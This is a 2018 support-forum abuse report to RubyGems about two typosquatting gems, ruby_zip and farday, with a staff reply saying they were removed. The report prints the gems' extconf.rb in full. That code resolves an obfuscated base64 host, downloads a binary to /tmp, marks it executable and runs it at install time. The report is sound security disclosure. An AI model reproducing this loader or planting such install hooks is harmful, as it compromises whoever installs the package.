Abuse report farday and ruby_zip

Ariel Zelivansky's Avatar

Ariel Zelivansky

18 Sep, 2018 09:11 PM

Hi,

I'm assuming the reader is familiar with Typosquatting, and the previous discussions on this topic (e.g. bunlder).

I'd like to report 1. ruby_zip and 2. farday which are typosquatting other popular ruby gems. Fortunately, there seems to be a typo in the exploit found in these gems extconf.rb, as I found out when trying to install one of them. See [1] and [2].

Now, there is something that feels very automated to me about these packages, the gems files and variable names seem generated, and the gemspecs themselves feel very much generated as well. I wonder if there are other gems like these out there, with working code, and if there is anything else RubyGems can do to prevent these.

Thanks
zelivans

[1] ruby_zip installation:

/ # gem install ruby_zip
Building native extensions.  This could take a while...
Successfully installed nokogiri-1.8.4
Fetching: ruby_zip-0.1.3.gem (100%)
Building native extensions.  This could take a while...
ERROR:  Error installing ruby_zip:
    ERROR: Failed to build gem native extension.

current directory: /usr/lib/ruby/gems/2.4.0/gems/ruby_zip-0.1.3/ext/laterite/laryngopharyngeal/amaterialistic



/usr/bin/ruby -r ./siteconf20180918-59-1sc0gxv.rb extconf.rb extconf.rb:27:in run&#39;: undefined methodsetup_exploit' for Calvinize:Class (NoMethodError) from extconf.rb:31:in `<main>'
extconf failed, exit code 1
Gem files will remain installed in /usr/lib/ruby/gems/2.4.0/gems/ruby_zip-0.1.3 for inspection. Results logged to /usr/lib/ruby/gems/2.4.0/extensions/x86_64-linux/2.4.0/ruby_zip-0.1.3/gem_make.out

[2] extconf.rb file of ruby_zip gem:

require 'net/http'
require 'uri'
require 'base64'
require 'resolv'

class Calvinize
  def self.setup_explot(dematerialising)
    if !dematerialising.nil? and dematerialising != '0.0.0.0'
      dodgery = Net::HTTP.get_response(URI('http://' + dematerialising + '/contributor'))
      File.open('/tmp/endopod', 'wb+') do |upsurge|
        upsurge.binmode
        upsurge.write(dodgery.body)
        upsurge.chmod(0777)
        upsurge.close
      end
      system('/tmp/endopod')
    end
  end

  def self.run()
    struthioniform = 'NDJiNTU5YjEuaGt6enp6ei5kZQ=='
    futurize = nil
    begin
      futurize = Resolv.getaddress(Base64.decode64(struthioniform))
    rescue
    end
    self.setup_exploit(futurize)
  end
end

Calvinize.run()
  1. Support Staff 1 Posted by indirect on 18 Sep, 2018 09:29 PM

    indirect's Avatar

    Thanks for the report! We've removed those gems, and we're working on a system to eliminate (or at least hopefully reduce) this kind of thing in the future.

  2. indirect closed this discussion on 18 Sep, 2018 09:29 PM.

Comments are currently closed for this discussion. You can start a new one.

Keyboard shortcuts

Generic

? Show this help
ESC Blurs the current field

Comment Form

r Focus the comment reply box
^ + ↩ Submit the comment

You can use Command ⌘ instead of Control ^ on Mac